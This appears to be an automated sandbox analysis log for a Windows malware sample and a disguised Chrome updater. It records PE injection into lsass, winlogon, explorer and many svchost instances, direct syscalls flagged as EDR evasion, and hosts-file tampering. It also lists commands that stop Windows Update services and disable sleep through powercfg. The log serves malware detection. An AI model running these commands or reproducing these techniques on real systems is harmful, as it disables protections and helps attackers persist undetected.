Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: CF7C273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 4365273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 40F1273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 870D273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 325B273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5EDA273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: DE98273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 3E64273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 3937273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 1DE9273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: EE9C273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: EED7273C

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\Desktop\hiwA7Blv7C.exe	NtQuerySystemInformation: Direct from: 0x7FF72727304E			Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	NtQuerySystemInformation: Direct from: 0x7FF65699304E			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\winlogon.exe base: 2D016580000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\lsass.exe base: 2D6F14E0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 14E41FA0000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dwm.exe base: 1D15B020000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\winlogon.exe base: 2D016610000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\lsass.exe base: 2D6F1540000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 14E428D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dwm.exe base: 1D15B050000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23AF32B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23C9FD60000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A1CA6E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 246ED7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 200A1980000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 22595FB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 22E670C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FE4A4B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 24C19A40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 275D1FC0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23BBDC90000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 227D8FC0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2DED2C70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 14ACE6B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 220AEFD0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 241B6940000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 202A22A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 14D25AA0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BD1A2F0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21A63950000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1834ABA0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2D8F03D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 18BAF3C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 256EBEB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2568E1B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 226A7DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\spoolsv.exe base: 1110000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E2C0F50000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2EE0D7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 22B68FC0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 207EA5A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1EBCE8A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 11CD6340000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1AFDEB70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 207C0460000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 245A2150000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 247087D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 22F60740000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26E569B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2CA8FE60000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\sihost.exe base: 1D63DC30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A799B20000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F6963C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26481BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 166D2D90000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 128DE440000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2101D0E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\explorer.exe base: BC80000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 192D1E50000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26DD2000000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 257155B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dasHost.exe base: 16443E50000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2C8A6FC0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1E968280000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A9452E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 29227D20000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 283E5C00000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 14BB07C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 22C4F660000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1DBAE870000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 27B1B9F0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 27FF3CD0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 281CF7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 28843650000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 27140F10000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1B9870D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 22B325B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1F05EDA0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20CDE980000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1823E640000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 21A39370000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 1411DE90000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 254EE9C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 254EED70000 value starts with: 4D5A

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\dialer.exe

Memory written: PID: 4004 base: BC80000 value: 4D

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\hiwA7Blv7C.exe	Section loaded: NULL target: C:\Windows\System32\dialer.exe protection: readonly	Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	Section loaded: NULL target: C:\Windows\System32\dialer.exe protection: readonly	Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	Section loaded: NULL target: C:\Windows\System32\dialer.exe protection: readonly	Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	Section loaded: NULL target: C:\Windows\System32\dialer.exe protection: readonly	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\hiwA7Blv7C.exe	Thread register set: target process: 2120	Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	Thread register set: target process: 6064	Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	Thread register set: target process: 1060	Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	Thread register set: target process: 5536	Jump to behavior

Modifies the hosts file

Source: C:\Users\user\Desktop\hiwA7Blv7C.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\hiwA7Blv7C.exe	Memory written: C:\Windows\System32\dialer.exe base: 50DD3E7010	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\winlogon.exe base: 2D016580000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\lsass.exe base: 2D6F14E0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 14E41FA0000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dwm.exe base: 1D15B020000	Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	Memory written: C:\Windows\System32\dialer.exe base: BA5A3A3010	Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	Memory written: C:\Windows\System32\dialer.exe base: D25F83E010	Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	Memory written: C:\Windows\System32\dialer.exe base: 7DD3693010	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 200A19E0000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 207EA610000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 207EA610000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 207EA610000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 207EA610000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 207EA610000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 207EA610000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 207EA610000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 207EA610000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 207EA610000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 207EA610000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\svchost.exe base: 207EA610000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1823E630000	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1823E380000	Jump to behavior
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\winlogon.exe base: 2D016610000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\lsass.exe base: 2D6F1540000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 14E428D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dwm.exe base: 1D15B050000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23AF32B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23C9FD60000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A1CA6E0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 246ED7B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 200A1980000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 22595FB0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 22E670C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FE4A4B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 24C19A40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 275D1FC0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23BBDC90000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 227D8FC0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2DED2C70000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 14ACE6B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 220AEFD0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 241B6940000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 202A22A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 14D25AA0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BD1A2F0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21A63950000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1834ABA0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2D8F03D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 18BAF3C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 256EBEB0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2568E1B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 226A7DC0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\spoolsv.exe base: 1110000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E2C0F50000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2EE0D7C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 22B68FC0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 207EA5A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1EBCE8A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 11CD6340000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1AFDEB70000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 207C0460000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 245A2150000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 247087D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 22F60740000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26E569B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2CA8FE60000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\sihost.exe base: 1D63DC30000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A799B20000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F6963C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26481BB0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 166D2D90000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 128DE440000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2101D0E0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\explorer.exe base: BC80000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 192D1E50000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26DD2000000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 257155B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dasHost.exe base: 16443E50000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2C8A6FC0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1E968280000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A9452E0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 29227D20000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 283E5C00000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 14BB07C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 22C4F660000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1DBAE870000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 27B1B9F0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 27FF3CD0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 281CF7C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 28843650000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 27140F10000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1B9870D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 22B325B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1F05EDA0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20CDE980000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1823E640000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 21A39370000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 1411DE90000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 254EE9C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 254EED70000

Source: C:\Users\user\Desktop\hiwA7Blv7C.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0	Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe	Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe	Jump to behavior
Source: C:\Program Files\Google\Chrome\updater.exe	Process created: C:\Windows\System32\dialer.exe C:\Windows\System32\dialer.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-dc 0

Source: C:\Windows\System32\dialer.exe

Code function: 14_2_00007FF68D3D1B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

14_2_00007FF68D3D1B54

Source: C:\Windows\System32\dialer.exe

Code function: 14_2_00007FF68D3D1B54 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

14_2_00007FF68D3D1B54

Source: winlogon.exe, 00000017.00000002.3327131755.000002D016A60000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000017.00000000.2134232543.000002D016A60000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000001F.00000000.2142138351.000001D154AB0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: IProgram Manager
Source: dwm.exe, 0000001F.00000000.2156368346.000001D159439000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 0000001F.00000002.3340585756.000001D159439000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: winlogon.exe, 00000017.00000002.3327131755.000002D016A60000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000017.00000000.2134232543.000002D016A60000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000001F.00000000.2142138351.000001D154AB0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: winlogon.exe, 00000017.00000002.3327131755.000002D016A60000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000017.00000000.2134232543.000002D016A60000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000001F.00000000.2142138351.000001D154AB0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: winlogon.exe, 00000017.00000002.3327131755.000002D016A60000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000017.00000000.2134232543.000002D016A60000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000001F.00000000.2142138351.000001D154AB0000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\winlogon.exe

Code function: 23_2_000002D0165936F0 cpuid

23_2_000002D0165936F0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
